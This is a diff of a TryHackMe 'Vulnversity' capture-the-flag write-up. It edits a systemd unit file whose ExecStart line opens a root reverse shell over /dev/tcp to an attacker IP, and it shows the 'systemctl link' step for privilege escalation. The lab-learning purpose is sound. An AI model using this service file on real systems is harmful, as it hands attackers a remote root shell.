fy0d-0r/thm-writeups/vulnversity/vulnversity.md

 [Service]
 Type=simple
+User=root
-ExecStart=/bin/bash -c 'exec 5<>/dev/tcp/10.12.34.56/1337; bash >&5 2>&5 0<&5'
+ExecStart=/bin/bash -c 'exec 5<>/dev/tcp/10.6.63.224/1338; bash >&5 2>&5 0<&5'

 [Install]
 WantedBy=multi-user.target
 ```

-Since we are creating `systemd` unit files under the directory that is not one of the standard directories of `systemd`, we have to create a symbolic link under /etc/systemd/system/ directory to make our unit file(`root.service`) available for management by systemctl by either running
+Since we are creating `systemd` unit files under the directory that is not one of the standard directories of `systemd`, we have to create a symbolic link under /etc/systemd/system/ directory to make our unit file(`root.service`) available for management by systemctl by either running.
 ```
 sudo systemctl link /tmp/root.service
 ```